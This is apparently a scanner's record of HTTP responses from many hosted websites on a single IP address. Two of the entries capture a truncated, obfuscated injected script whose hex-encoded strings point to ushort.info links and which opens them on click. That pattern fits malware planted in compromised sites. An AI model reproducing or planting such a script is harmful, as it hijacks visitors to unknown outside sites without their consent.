    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1161
    date: Mon, 22 Dec 2025 17:21:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.bokitas.devdecimosite2025.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · redarkgroup.com

    2025-12-22 17:06

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://redarkgroup.com/wp-json/>; rel="https://api.w.org/"
    link: <https://redarkgroup.com/wp-json/wp/v2/pages/126>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://redarkgroup.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 17:06:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.blog.jobrh.com

    2025-12-22 17:04

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://blog.jobrh.com/
    content-length: 0
    date: Mon, 22 Dec 2025 17:04:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · testnews.cdcit.in

    2025-12-22 16:59

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://testnews.cdcit.in/wp-json/>; rel="https://api.w.org/"
    link: <https://testnews.cdcit.in/wp-json/wp/v2/pages/26>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://testnews.cdcit.in/>; rel=shortlink
    etag: "269093-1766404797;;;"
    x-litespeed-cache: hit
    content-length: 460721
    date: Mon, 22 Dec 2025 16:59:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x58\x6c\x7a\x33\x63\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x69\x46\x62\x35\x63\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4f\x4a\x66\x38\x63\x348','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x66\x62\x51\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4c\x76\x55\x34\x63\x334','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x62\x42\x4f\x37\x63\x307','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x57\x4e\x4a\x32\x63\x332','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x6d\x4a\x68\x36\x63\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.uniqpowersolutions.com

    2025-12-22 16:55

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    set-cookie: PHPSESSID=1ed6e43dc6fa3e92038a9ed0f9f10c5c; path=/; secure
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://uniqpowersolutions.com/
    x-litespeed-cache: miss
    content-length: 29048
    date: Mon, 22 Dec 2025 16:55:42 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x58\x6c\x7a\x33\x63\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x69\x46\x62\x35\x63\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4f\x4a\x66\x38\x63\x348','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x66\x62\x51\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4c\x76\x55\x34\x63\x334','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x62\x42\x4f\x37\x63\x307','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x57\x4e\x4a\x32\x63\x332','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x6d\x4a\x68\x36\x63\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · walchakpouredwalls.com

    2025-12-22 16:47

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://walchakpouredwalls.com/wp-json/>; rel="https://api.w.org/"
    link: <https://walchakpouredwalls.com/wp-json/wp/v2/pages/99>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://walchakpouredwalls.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 16:47:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.slotspin88.com

    2025-12-22 16:47

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://slotspin88.com/
    server-timing: 
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 16:47:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · uniqpowersolutions.com

    2025-12-22 16:47

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    set-cookie: PHPSESSID=03d837bfadcb005c7d8c754d89a3251c; path=/; secure
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    link: <https://uniqpowersolutions.com/wp-json/>; rel="https://api.w.org/"
    link: <https://uniqpowersolutions.com/wp-json/wp/v2/pages/69>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://uniqpowersolutions.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 1e4_front,1e4_URL.6666cd76f96956469e7be39d750cc7d9,1e4_F,1e4_Po.69,1e4_PGS,1e4_
    etag: "272176-1766422035;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 16:47:15 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · antonsol.com

    2025-12-22 16:41

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://antonsol.com/wp-json/>; rel="https://api.w.org/"
    etag: "722-1766421682;;;"
    x-litespeed-cache: miss
    content-length: 31628
    date: Mon, 22 Dec 2025 16:41:22 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Ant on Sol – Join the colony!
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Ant on Sol &#8211; Join the colony!</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel="alternate" type="application/rss+xml" title="Ant on Sol &raquo; Feed" href="https://antonsol.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="Ant on Sol &raquo; Comments Feed" href="https://antonsol.com/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/antonsol.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2"}};
    /*! This file is auto-generated */
    !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    
    <style id='wp-emoji-styles-inline-css'>
    
    	img.wp-smiley, img.emoji {
    		display: inline !important;
    		border: none !important;
    		box-shadow: none !important;
    		height: 1em !important;
    		width: 1em !important;
    		margin: 0 0.07em !important;
    		vertical-al
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · moyo.goodybuy.xyz

    2025-12-22 16:38

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    set-cookie: ibx_wpfomo_ip=167.71.175.236; expires=Thu, 22-Jan-2026 16:38:22 GMT; Max-Age=2678400; path=/; secure
    content-type: text/html; charset=UTF-8
    link: <https://moyo.goodybuy.xyz/wp-json/>; rel="https://api.w.org/"
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: cda_home,cda_URL.6666cd76f96956469e7be39d750cc7d9,cda_F,cda_
    etag: "44294-1766421503;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 16:38:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · videoeditorusa.com

    2025-12-22 16:34

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://videoeditorusa.com/wp-json/>; rel="https://api.w.org/"
    link: <https://videoeditorusa.com/wp-json/wp/v2/pages/25>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://videoeditorusa.com/>; rel=shortlink
    etag: "898-1766405421;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 16:34:02 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.webmoo.net

    2025-12-22 16:17

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://webmoo.net/
    x-litespeed-cache: hit
    content-length: 0
    date: Mon, 22 Dec 2025 16:17:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · newstest.cdcit.in

    2025-12-22 16:17

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1369
    date: Mon, 22 Dec 2025 16:17:05 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="188129394">2025-12-05 10:09</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at newstest.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.newstest.cdcit.in

    2025-12-22 16:17

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1373
    date: Mon, 22 Dec 2025 16:17:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="188129394">2025-12-05 10:09</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.newstest.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · drsat.net

    2025-12-22 16:14

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://drsat.net/wp-json/>; rel="https://api.w.org/"
    etag: "8213-1766396214;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 16:14:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · paraparappucheithi.com

    2025-12-22 14:53

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://paraparappucheithi.com/wp-json/>; rel="https://api.w.org/"
    etag: "268954-1766403973;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 14:53:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.modecart.store

    2025-12-22 14:52

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Mon, 22 Dec 2025 14:52:51 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.modecart.store/cgi-sys/suspendedpage.cgi
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
